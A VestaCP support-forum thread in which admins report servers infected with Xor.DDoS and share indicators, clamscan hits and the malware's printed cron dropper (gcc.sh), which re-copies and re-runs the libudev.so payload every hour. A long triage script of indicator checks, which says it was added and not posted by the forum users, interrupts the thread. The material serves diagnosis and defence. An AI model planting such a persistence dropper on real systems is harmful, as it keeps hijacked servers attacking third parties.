We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on Vesta 2.0 and expect to release it by the end of 2024. Read more about it: https://vestacp.com/docs/vesta-2-development
Got 10 VestaCP servers exploited
Hello!
Today I was surprised to discover that 10 of our customers' servers were being exploited (attacking a Chinese IP). All these servers have nothing in common but the fact that they all run VestaCP. None of my non-VestaCP servers were affected.
I would like to ask if anyone else was also affected. Any chance there's a VestaCP vulnerability being exploited in the wild?
Thank you in advance.
Kindly, Albertus
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
This happened to my clients.
I have 3 clients from different geographic locations.
All they have in common is that their servers got suspended by OVH and that they are using Vesta.
They all allegedly did a SYN flood to the same IP:
111.231.132.129
Which is crazy.
Re: Got 10 VestaCP servers exploited
Albertus, where are your servers?
OVH?
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
Interestingly, OVH refuses to provide rescue access to the backup files so I can investigate what happened.
For one server they provided read-only FTP access, and I can't read/download/open any of the files.
This is really suspicious to me.
It looks like OVH nodes got hacked.
Re: Got 10 VestaCP servers exploited
Albertus, can you tell us in which variant you installed Vesta, default (nginx+apache) or nginx+fpm?
Which Linux distribution are you using?
Re: Got 10 VestaCP servers exploited
Me too. I've created another thread (in Russian). But my provider is FastVPS, not OVH.
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
One of the client VPSes at OVH got unlocked.
First they strongly resisted even giving rescue access to the files, and then they simply unlocked it without saying what the deal was.
I am just going to block that IP in the firewall, as I found no evidence in the logs, after the server got unlocked, that it was attacking like they claim.
- Posts: 1
- Joined: Sat Apr 07, 2018 4:41 pm
- Os: CentOS 6x
- Web: nginx + php-fpm
Re: Got 10 VestaCP servers exploited
The same thing: some VDSes were exploited; all have Vesta installed on CentOS 7, as far as I can see.
Most of the systems were compromised a few days ago (4-5 April). The malicious software used for the attacks is a variant of Linux/Xorddos.C (https://en.wikipedia.org/wiki/Xor_DDoS); you can find files like gcc.sh, /tmp/update, /usr/lib/libudev.so.
Clamscan can detect this malware, for example:
# clamscan -r -i /usr
/usr/bin/tcfndpnals: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND
We are still investigating how the systems were compromised.
Re: Got 10 VestaCP servers exploited
Found in /etc/cron.hourly/gcc.sh, modified 04.04.2018 16:25:00.
I did not think that the infection was a few days ago. I analyzed all the logs for today: nothing suspicious, no authorization in Vesta and so on.
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
# Bring every interface listed in /proc/net/dev up, each in the background.
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
# Re-create the payload copy and execute it. Because the script sits in
# /etc/cron.hourly this runs every hour, so killing the process or deleting
# libudev.so.6 alone does not remove the infection.
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
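The two posts above (the clamscan findings and the gcc.sh cron dropper) give enough concrete indicators for a first triage sweep. The script below is an added example, not code from this thread or from VestaCP. It takes the indicators named in the thread as given (the file paths gcc.sh, /tmp/update, /lib/libudev.so, /usr/lib/libudev.so, the cron script that copies and runs libudev.so, the target IP 111.231.132.129, and the random-named /usr/bin/tcfndpnals) and generalises them in two ways that are assumptions, not facts from the thread: it treats other copies of the payload as byte-identical to /lib/libudev.so (which is what the cp in gcc.sh produces for libudev.so.6), and it reads a connection table in ss/netstat format to spot traffic to the target. The root-prefix argument lets the same sweep run over a mounted rescue image instead of the live host.

```shell
#!/bin/sh
# Added Xor.DDoS triage sweep (example code, not from the thread or VestaCP).
# Usage: sh xorddos_triage.sh /        (live system)
#        sh xorddos_triage.sh /mnt     (rescue image mounted at /mnt)
# With no argument only the functions are defined, so the file can be sourced.

# File indicators named in the thread: cron dropper, staging file, payload.
XORDDOS_PATHS="/etc/cron.hourly/gcc.sh /tmp/update /lib/libudev.so /lib/libudev.so.6 /usr/lib/libudev.so"

# Attack target reported by two posters in the thread.
XORDDOS_TARGET="111.231.132.129"

# Print each indicator file present under the root prefix $1.
# Returns 0 when nothing was found, 1 when at least one indicator exists.
xorddos_files() {
    root="${1:-}"
    found=0
    for p in $XORDDOS_PATHS; do
        if [ -e "$root$p" ]; then
            echo "IOC file: $root$p"
            found=1
        fi
    done
    return $found
}

# Flag cron scripts that copy or run libudev.so or /tmp/update, i.e. the
# gcc.sh pattern, whatever file name the dropper chose this time.
xorddos_cron() {
    root="${1:-}"
    found=0
    for f in "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/* \
             "$root"/etc/cron.d/* "$root"/etc/crontab; do
        [ -f "$f" ] || continue
        if grep -qE 'libudev\.so|/tmp/update' "$f" 2>/dev/null; then
            echo "suspicious cron entry: $f"
            found=1
        fi
    done
    return $found
}

# Find byte-identical copies of the payload in the usual binary directories.
# Assumption: copies such as /usr/bin/tcfndpnals are exact duplicates of
# /lib/libudev.so, as the cp in gcc.sh makes libudev.so.6. Size is compared
# first so cksum only reads candidates of the right length.
xorddos_copies() {
    root="${1:-}"
    src="$root/lib/libudev.so"
    [ -f "$src" ] || return 0
    size=$(wc -c < "$src")
    ref=$(cksum < "$src")
    found=0
    for f in "$root"/bin/* "$root"/usr/bin/* "$root"/lib/* "$root"/usr/lib/*; do
        [ -f "$f" ] || continue
        [ "$f" = "$src" ] && continue
        [ "$(wc -c < "$f" 2>/dev/null)" -eq "$size" ] 2>/dev/null || continue
        if [ "$(cksum < "$f" 2>/dev/null)" = "$ref" ]; then
            echo "copy of payload: $f"
            found=1
        fi
    done
    return $found
}

# Read 'ss -nt' or 'netstat -nt' output on stdin and print the lines whose
# peer is the target IP (any port). Exit status is grep's: 0 if any matched.
xorddos_conns() {
    target="${1:-$XORDDOS_TARGET}"
    pat=$(printf '%s' "$target" | sed 's/\./\\./g')
    grep -E "[[:space:]]${pat}:[0-9]+"
}

# Run every check against the given root; the live connection check only
# makes sense on the running host, not on a mounted image.
if [ $# -gt 0 ]; then
    status=0
    xorddos_files "$1" || status=1
    xorddos_cron "$1" || status=1
    xorddos_copies "$1" || status=1
    if [ "$1" = "/" ] && command -v ss >/dev/null 2>&1; then
        ss -nt | xorddos_conns || true
    fi
    exit $status
fi
```

A hit from any of the file checks is a reason to reinstall rather than clean: the cron entry re-creates the payload hourly, and the thread itself notes that clamscan found a second copy under a random name in /usr/bin, so deleting the two files you happen to know about is not enough. Run the sweep from a rescue image where the provider allows it, since the running bot can hide from tools on the infected host.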
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
I also see gcc.sh present, and the Unix tool....
:(